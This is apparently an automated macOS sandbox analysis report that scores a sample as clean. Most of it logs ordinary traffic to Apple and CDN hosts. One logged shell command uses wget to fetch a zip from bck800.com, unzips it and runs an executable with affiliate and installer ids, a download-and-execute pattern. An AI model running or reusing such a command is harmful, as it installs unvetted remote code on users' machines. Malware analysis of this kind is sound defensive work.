macOS Analysis Report

Overview

General Information

Analysis ID:	1545744
Infos:

Detection

Score:	1
Range:	0 - 100
Whitelisted:	false

Signatures

Executes commands using a shell command-line interpreter

Reads the systems hostname

Classification

Signatures

Source: unknown	HTTPS traffic detected: 151.101.3.8:443 -> 192.168.11.12:49382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.8:443 -> 192.168.11.12:49383 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.8:443 -> 192.168.11.12:49384 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49387 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49395 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49397 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49398 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49399 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.49.152
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.49.152
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.49.152
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.49.152
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.49.152
Source: unknown	TCP traffic detected without corresponding DNS query: 23.197.252.31
Source: unknown	TCP traffic detected without corresponding DNS query: 23.197.252.31
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.49.152
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.49.152
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.49.152
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.49.152
Source: unknown	TCP traffic detected without corresponding DNS query: 23.199.49.152
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /2021/mobileassets/041-40471/B96AF6E1-5FF6-4786-9956-944A1AFE086A/com_apple_MobileAsset_KextDenyList/404087a7302927411b6ea0e05114d2c68355185e.zip HTTP/1.1Host: updates.cdn-apple.comAccept: /Accept-Language: en-usConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: mobileassetd (unknown version) CFNetwork/976 Darwin/18.2.0 (x86_64)
Source: global traffic	HTTP traffic detected: GET /2024/patches/062-47618/2296644A-2400-46B4-A723-9D2B5B310BB3/com_apple_MobileAsset_CoreSuggestions/d0953e982fbb98874ebf11b227f84d8d5094f457.zip HTTP/1.1Host: updates.cdn-apple.comAccept: /Accept-Language: en-usConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: mobileassetd (unknown version) CFNetwork/976 Darwin/18.2.0 (x86_64)
Source: global traffic	HTTP traffic detected: GET /2024/patches/052-54451/D609556E-69B1-482E-9C33-B2E3510A1311/com_apple_MobileAsset_TimeZoneUpdate/c5a4d0df08e8faecf4faebbbadc4d96a07d9d990.zip HTTP/1.1Host: updates.cdn-apple.comAccept: /Accept-Language: en-usConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: mobileassetd (unknown version) CFNetwork/976 Darwin/18.2.0 (x86_64)

Source: global traffic

DNS traffic detected: DNS query: h3.apis.apple.map.fastly.net

Source: unknown	Network traffic detected: HTTP traffic on port 49399 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49397 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49387
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49386
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49384
Source: unknown	Network traffic detected: HTTP traffic on port 49393 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49383
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49382
Source: unknown	Network traffic detected: HTTP traffic on port 49395 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49391 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49384 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49398 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49399
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49398
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49397
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49395
Source: unknown	Network traffic detected: HTTP traffic on port 49394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49394
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49393
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49392
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49391
Source: unknown	Network traffic detected: HTTP traffic on port 49396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49387 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49383 -> 443

Source: unknown	HTTPS traffic detected: 151.101.3.8:443 -> 192.168.11.12:49382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.8:443 -> 192.168.11.12:49383 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.8:443 -> 192.168.11.12:49384 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49387 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49395 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49397 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49398 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49399 version: TLS 1.2

Source: classification engine

Classification label: clean1.mac@0/0@1/0

Executes commands using a shell command-line interpreter

Source: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 (PID: 614)

Shell command executed: /bin/sh -c wget http://bck800.com/static/apps/437.zip && unzip 437.zip && ./V6QED2Q1WBYVOPE --safetorun --host=bck800.com --partner.affiliate_id=10 --partner.installer_id=92 --partner.user_id=178300000

Jump to behavior

Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 634)

Random device file read: /dev/random

Jump to behavior

Reads the systems hostname

Source: /bin/sh (PID: 614)

Sysctl requested: kern.hostname (1.10)

Jump to behavior

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.199.49.152	unknown	United States	20940	AKAMAI-ASN1EU	false
151.101.195.6	h3.apis.apple.map.fastly.net	United States	54113	FASTLYUS	false
23.197.252.31	unknown	United States	16625	AKAMAI-ASUS	false
151.101.3.8	appledownload.map.fastly.net	United States	54113	FASTLYUS	false

Contacted Domains

Name	IP	Active
appledownload.map.fastly.net	151.101.3.8	true
h3.apis.apple.map.fastly.net	151.101.195.6	true

ID:	1545744
Product:	CloudBasic
Start time:	22:47:15
Start date:	30.10.2024
Cookbook:	defaultmaccmdlinecookbook.jbs
System description:	Virtual Machine, Mojave (Office 16 16.27, Java 11.0.2+9, Adobe Reader 2019.010.20099)
Architecture:	MAC

macOS Analysis Report

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance

Networking

System Summary

Persistence and Installation Behavior

Language, Device and Operating System Detection

Screenshots

Network Map

Contacted Public IPs

Contacted Domains